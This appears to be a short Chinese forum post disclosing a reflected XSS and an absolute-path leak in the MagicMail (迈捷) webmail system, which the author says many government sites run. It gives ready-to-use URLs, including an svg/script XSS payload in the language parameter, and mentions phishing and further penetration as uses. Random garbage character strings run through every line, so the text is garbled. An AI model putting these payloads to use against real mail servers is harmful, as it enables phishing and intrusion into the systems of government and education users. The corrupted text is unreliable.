今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞4 ~0 m" W# R/ t6 a0 R
: ~. }# m$ i" {
: W" } J' `! c2 m1 B
包含 一个反射性XSS 以及 绝对路径泄漏
9 I* H! K% p" A* G看了看 貌似全部是linux的。7 U' j: E8 S B; Z! {
0 D: C1 b: D$ w" H. a& e
关键字:迈捷邮件系统 by MagicMail. p8 Z$ W- e+ J X$ @& j8 ]
, u# v7 K. Y" |+ W4 V L& F% K
可以看到很多政府网站都用这个邮件系统1 C4 E# X+ _( c0 D+ r
2 _/ k: n: u2 S) U) y; D绝对路径 http://madman.in/index.php?login_type=declare&language=+ I% C- w/ w7 t6 X3 z% R
4 G# @) M6 n1 R$ A+ I: I. s" ?7 K# {, t/ _2 b! p
" B( H8 I' d' u! A9 n( u
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
# @2 Y2 ~, T, k& X/ _5 M, L/ C
* H) P; P" p" W9 v4 C# J) C& V! k2 n
( t q2 m/ i2 x6 x8 A9 T1 x8 z4 V
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等' ^3 J+ `0 R# j0 o9 g/ `
- O: h( |1 P: r, x修复方案:看官方补丁吧。
0 K1 o0 r6 q% a0 L8 u5 E/ \2 J# w: B |